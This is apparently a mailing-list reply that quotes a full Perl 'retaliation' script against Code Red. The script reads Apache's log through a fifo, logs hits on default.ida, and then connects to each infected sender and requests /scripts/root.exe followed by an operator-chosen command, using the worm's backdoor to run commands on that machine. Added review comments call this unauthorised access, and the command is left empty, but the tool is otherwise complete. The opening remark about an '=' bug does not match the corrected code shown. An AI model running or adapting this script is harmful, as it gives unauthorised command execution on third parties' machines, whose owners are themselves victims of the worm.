Re: FW: Careful. This is for information only.
So creating a fifo for apache to write its access log to and a script
like this would be a faux pas then?... (It would: the script connects back to whatever host appears in the first field of the log line and sends it a command, which is unauthorised access to a third party's machine -- the infected host is itself a victim -- and, as written, it fires on every default.ida hit because the version test uses `=` instead of `eq` and the `else` in logit() is attached to the wrong `if`.)
-Max
#!/usr/bin/perl
#
# Script to retaliate against Code Red Attacks.
# the author is not responsible for how you use this educational script.
use Socket;
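$fifo = "/var/log/apache/apache.fifo";
$httplogfile = "/var/log/apache/access.log";
$wormlogfile = "/var/log/apache/codered.log";
# The command you want to run on the compromised machine.
# NOTE(review): whatever is put here is sent, unmodified, to a third-party
# host chosen from a field of the incoming log line (see attack()).  Sending
# commands to a machine you do not own or have authorisation for is
# unauthorised access regardless of the fact that it is already infected;
# leaving this empty is the only safe setting.
$win_command = "";
#
# Shouldn't need to do anything below here
#
# Main loop.  Apache writes its access log into $fifo; every line is copied
# to the real access log by httplog(), and lines carrying the Code Red
# signature ("default.ida" in the request) are additionally recorded in
# $wormlogfile by logit(), which leaves the detected variant in the global
# $version.
#
# Caveats a practitioner should know before running this:
#  - This process is Apache's only consumer of the fifo.  Every open() below
#    and in the subs dies on failure, so a transient log-file problem takes
#    the reader away and Apache's writes to the fifo fail with it.
#  - The client address is field 0 of the log line exactly as Apache wrote
#    it.  With HostnameLookups on that is a hostname rather than an address,
#    so attack() is only reached for something that at least looks like a
#    dotted-quad IPv4 literal.
#  - The original tested $version with "=" (assignment, always true), so
#    attack() ran on every default.ida hit; "eq" is the intended comparison.
#  - A fifo delivers EOF as soon as its writer closes it (Apache restart,
#    graceful, log rotation).  Re-opening inside the loop blocks until a
#    writer is back, instead of spinning on a handle that stays at EOF.
while (1){
    open (FILE, "<", $fifo) or die "cant open fifo";
    while (<FILE>){
        httplog();
        next unless $_ =~ m/default\.ida/;
        $ip = (split " ", $_)[0];
        logit();
        if ($version eq "2/3" && $ip =~ m/\A\d{1,3}(?:\.\d{1,3}){3}\z/){
            attack();
        }
    }
    # Writer went away; loop round and block on open() until the next one.
    close FILE;
}
# Will never get here
close FILE;
exit 0;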
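sub httplog {
    # Append the current log line ($_, as read from the fifo by the main
    # loop) to the real Apache access log, so using a fifo does not cost us
    # the normal log.  The file is opened and closed per line: slow, but the
    # line is on disk even if this process dies mid-stream.
    # Dies if the log cannot be opened or the buffered write fails at close
    # (which also removes Apache's fifo reader -- see the main loop).
    my $line = $_;
    open (my $log, ">>", $httplogfile) or die "cant open http logfile";
    print {$log} $line;
    close ($log) or die "cant write http logfile";
    return;
}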
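sub logit {
    # Record a Code Red hit in $wormlogfile as "<date> - <ip> v<version>]"
    # and leave the detected variant in the global $version for the caller.
    # Reads the log line from $_ and the client address from the global $ip
    # (both set by the main loop).  Field 3 of a common-log-format line is
    # "[dd/Mon/yyyy:hh:mm:ss", which is why the closing "]" is appended at
    # the end of the record rather than right after the date.
    #
    # The variant is guessed from the filler bytes in the default.ida request:
    # "XXXXXX" -> "2/3", "NNNNNN" -> "1", anything else -> "?".  The original
    # used two independent ifs, so the "else" belonged only to the NNNNNN
    # test and overwrote a "2/3" result with "?"; an if/elsif/else chain is
    # what was meant.
    # Dies if the log cannot be opened or the write does not reach disk.
    my $line = $_;
    $date = (split " ", $line)[3];
    if ($line =~ m/XXXXXX/) {
        $version = "2/3";
    }
    elsif ($line =~ m/NNNNNN/) {
        $version = "1";
    }
    else {
        $version = "?";
    }
    open (my $log, ">>", $wormlogfile) or die "cant open logfile";
    print {$log} $date, " - ", $ip, " v", $version, "]\n";
    close ($log) or die "cant write logfile";
    return;
}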
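sub attack {
    # Connect to port 80 of the host in the global $ip and send it a request
    # for /scripts/root.exe followed by $win_command.
    #
    # NOTE(review): $ip is somebody else's machine, identified only by a field
    # of a log line it sent us, and nothing here was authorised by its owner.
    # Connecting to it and issuing commands is unauthorised access in most
    # jurisdictions whether or not the host is worm-infected; that host is a
    # victim, not the attacker.  Left as the author wrote it for reading,
    # not for deployment.
    #
    # The request bytes are sent verbatim as in the original; no attempt has
    # been made to change them.  What is fixed: a failed address conversion,
    # socket() or connect() now logs ATTACK FAILED and returns, instead of
    # falling through and printing to a socket that was never connected.
    # inet_aton() on a non-literal (e.g. a hostname when Apache has
    # HostnameLookups on) does a blocking DNS lookup and returns undef on
    # failure, which sockaddr_in() would croak on, so it is checked first.
    my $proto = getprotobyname('tcp');
    my $packed = inet_aton($ip);
    unless (defined $packed) {
        attack_failed();
        return;
    }
    my $sin = sockaddr_in(80, $packed);
    unless (socket(my $osock, PF_INET, SOCK_STREAM, $proto)) {
        attack_failed();
        return;
    }
    unless (connect($osock, $sin)) {
        attack_failed();
        close ($osock);
        return;
    }
    print {$osock} "GET /scripts/root.exe HTTP/1.0 \n";
    print {$osock} $win_command,"\n";
    close ($osock);
    return;
}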
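sub attack_failed {
    # Append "<ip> - ATTACK FAILED" to $wormlogfile for the global $ip.
    # Called by attack() when it cannot reach the host.
    # Dies if the log cannot be opened or the write does not reach disk.
    open (my $log, ">>", $wormlogfile) or die "cant open logfile";
    print {$log} $ip, " - ATTACK FAILED\n";
    close ($log) or die "cant write logfile";
    return;
}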
--
Max Lock, Senior Linux Systems Administrator, TELE2 Mission Control UK.
Linux like wigwam. No windows, no gates, Apache inside.
Reply to: